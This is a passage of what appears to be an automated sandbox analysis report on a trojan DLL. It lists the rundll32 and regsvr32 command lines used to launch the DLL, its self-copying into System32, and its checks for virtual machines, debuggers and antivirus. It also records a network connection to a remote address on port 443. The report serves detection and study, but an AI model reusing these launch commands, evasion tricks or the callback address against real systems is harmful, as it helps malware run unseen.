                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800203346_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800107586_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001435C6_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180009F5C6_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800293686_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800207686_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800173786_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
                      Source: auExrOTnvB.dllVirustotal: Detection: 32%
                      Source: auExrOTnvB.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\auExrOTnvB.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\auExrOTnvB.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\auExrOTnvB.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\auExrOTnvB.dll,DllUnregisterServer
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ScjWhFiaOACVkfkp\NbnBEvmCoIR.dll"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\auExrOTnvB.dllJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\auExrOTnvB.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\auExrOTnvB.dll,DllUnregisterServerJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ScjWhFiaOACVkfkp\NbnBEvmCoIR.dll"Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
                      Source: classification engineClassification label: mal92.troj.evad.winDLL@28/6@0/3
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800046A8 CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,FindCloseChangeNotification,6_2_00000001800046A8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6992:120:WilError_01
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: auExrOTnvB.dllStatic PE information: Image base 0x180000000 > 0x60000000
                      Source: auExrOTnvB.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000006.00000002.662723758.0000000000594000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000006.00000002.662723758.0000000000594000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AFFD push ebp; retf 2_2_000000018001AFFE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800051D1 push ebp; iretd 2_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BA32 push ebp; retf 2_2_000000018001BA33
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180004E83 push es; ret 2_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B694 push es; ret 2_2_000000018001B6E9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BADD push ebp; iretd 2_2_000000018001BADE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B717 push ebp; iretd 2_2_000000018001B718
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AF4E push ebp; retf 2_2_000000018001AF4F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800253BC pushfd ; retn 0057h2_2_00000001800253BD
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AFFD push ebp; retf 3_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800051D1 push ebp; iretd 3_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BA32 push ebp; retf 3_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180004E83 push es; ret 3_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B694 push es; ret 3_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BADD push ebp; iretd 3_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B717 push ebp; iretd 3_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180007B3F push esp; retf 3_2_0000000180007B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AF4E push ebp; retf 3_2_000000018001AF4F
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AFFD push ebp; retf 4_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800051D1 push ebp; iretd 4_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BA32 push ebp; retf 4_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180004E83 push es; ret 4_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B694 push es; ret 4_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BADD push ebp; iretd 4_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B717 push ebp; iretd 4_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180007B3F push esp; retf 4_2_0000000180007B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AF4E push ebp; retf 4_2_000000018001AF4F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800051D1 push ebp; iretd 6_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180004E83 push es; ret 6_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180007B3F push esp; retf 6_2_0000000180007B40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC67207BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,2_2_00007FFC67207BE8
                      Source: auExrOTnvB.dllStatic PE information: real checksum: 0x85ab6 should be: 0x89f29
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\auExrOTnvB.dll
                      Source: C:\Windows\System32\regsvr32.exePE file moved: C:\Windows\System32\ScjWhFiaOACVkfkp\NbnBEvmCoIR.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\ScjWhFiaOACVkfkp\NbnBEvmCoIR.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\HsvWfK\qjfPaPuJJQf.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\NvVaHEFGUrqZToXD\HhtGx.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7140Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 3736Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6844Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6500Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-10070
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000D26C
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-10072
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: regsvr32.exe, 00000006.00000003.354394913.000000000088D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.663060683.0000000000896000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP1
                      Source: svchost.exe, 00000010.00000002.609096822.000001D672661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@Hyper-V RAW
                      Source: svchost.exe, 00000017.00000002.663872752.000001DC60C0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware(@{77310A73-4750-96E4-D354-A9A5731D72E3}
                      Source: svchost.exe, 00000017.00000002.663777341.000001DC6052F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                      Source: svchost.exe, 00000017.00000002.663368257.000001DC5FC62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                      Source: svchost.exe, 0000001E.00000002.581367651.000002740C4AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                      Source: rundll32.exe, 00000004.00000002.278714051.0000026ED8FD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}
                      Source: svchost.exe, 00000017.00000002.663523184.000001DC5FCB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWsettings-windata.microsoft.com
                      Source: svchost.exe, 00000010.00000002.608506134.000001D66CE29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW-fr
                      Source: svchost.exe, 00000017.00000002.663777341.000001DC6052F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7,1
                      Source: svchost.exe, 00000017.00000002.663777341.000001DC6052F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                      Source: regsvr32.exe, 00000006.00000002.663088023.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.354394913.000000000088D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.354418035.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.354491366.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.609069233.000001D67264B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.663570576.000001DC5FCCD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.581547659.000002740C4E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: regsvr32.exe, 00000006.00000002.663088023.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.354394913.000000000088D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.354418035.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.354491366.00000000008B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW&
                      Source: svchost.exe, 00000009.00000002.662927987.0000021B11602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 00000017.00000002.663777341.000001DC6052F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
                      Source: svchost.exe, 00000017.00000002.663777341.000001DC6052F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                      Source: svchost.exe, 00000017.00000002.663777341.000001DC6052F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                      Source: svchost.exe, 00000017.00000002.663872752.000001DC60C0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware(@{
                      Source: svchost.exe, 00000017.00000002.663777341.000001DC6052F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
                      Source: svchost.exe, 00000017.00000002.663777341.000001DC6052F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                      Source: svchost.exe, 00000017.00000002.663777341.000001DC6052F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021
                      Source: svchost.exe, 00000009.00000002.663196060.0000021B1163F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.663346061.000001C82CE51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.663071720.00000213B5224000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC672020E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFC672020E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC67207BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,2_2_00007FFC67207BE8
                      Source: C:\Windows\System32\loaddll64.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720D318 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFC6720D318
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC672020E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFC672020E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC67206550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFC67206550

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,2_2_00007FFC6720C39C
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA,2_2_00007FFC6720DF98
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFC6720C7F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFC6720C834
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,2_2_00007FFC6720C450
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,2_2_00007FFC6720C2B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,2_2_00007FFC6720C6E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_00007FFC6720DF20
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_00007FFC6720DF3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,2_2_00007FFC6720E1E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFC6720C8C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,2_2_00007FFC6720C934
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,2_2_00007FFC6720C16C
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC67204558 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_00007FFC67204558
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720E6C0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00007FFC6720E6C0

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 0000000E.00000002.663325778.000001F108040000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
                      Source: svchost.exe, 00000017.00000002.663851276.000001DC605F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
                      Source: svchost.exe, 0000000E.00000002.663265780.000001F108029000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.663439464.000001F108102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.663069706.000001F108013000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 6.2.regsvr32.exe.21f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2ace68d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2ace68d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.d00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.26ed90d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.26ed90d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.21f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.d00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.278869387.0000026ED90D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.278205273.000002ACE68D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.663304380.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.663485970.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.280524606.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
